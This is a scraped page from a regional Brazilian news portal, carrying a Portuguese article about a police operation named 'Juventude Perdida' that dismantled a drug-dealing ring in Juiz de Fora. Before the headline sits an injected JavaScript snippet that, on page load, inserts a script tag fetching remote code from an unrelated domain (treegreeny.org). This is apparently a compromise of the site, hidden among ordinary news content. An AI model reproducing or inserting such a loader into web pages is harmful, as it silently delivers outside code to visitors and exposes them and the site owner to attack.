;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Polícia Civil deflagra operação “Juventude Perdida” em Juiz de Fora. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Polícia Civil deflagra operação “Juventude Perdida” em Juiz de Fora.

A Polícia Civil, por meio do 4º Departamento de Juiz de Fora (4º DEPPC) e da Delegacia Especializada de Antidrogas (DEA), desencadeou, desde a última semana, várias ações nos bairros Bom Pastor, Alto dos Passos, São Mateus, Previdenciários, São Pedro, Marilândia e Bairu com o objetivo de desmontar um esquema de venda de drogas. Três homens, de 20, 24 e 30 anos, todos de classe média alta, foram presos em flagrante por tráfico e associação para o tráfico de drogas. A operação, batizada como “Juventude Perdida”, também culminou na apreensão de mais de cinco quilos de maconha, porção de cocaína, um caderno de contabilidade, celulares, três motos, dois veículos – sendo um deles clonado -, mais de R$1 mil, facas, munições, uma espingarda calibre 12 e outros materiais relacionados ao tráfico.
Conforme o delegado Rogério Woyame, também foram detidos outros três homens. “Um deles foi preso pelo crime de posse de munição de uso permitido, pagou a fiança e foi liberado. Outros dois jovens também foram detidos, mas eram usuários de drogas e foram liberados”, explicou. Investigações apontam que o trio recebia a droga de outras cidades e revendia em Juiz de Fora e que eles também estavam envolvidos com a adulteração de veículos. “A surpresa das apurações foi que eram jovens de classe média e que não precisavam estar envolvidos nesses crimes. Os próprios pais ficaram surpresos com a situação”, ressaltou, complementando que dessa operação será desencadeada uma nova investigação para apurar a participação de outros autores.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.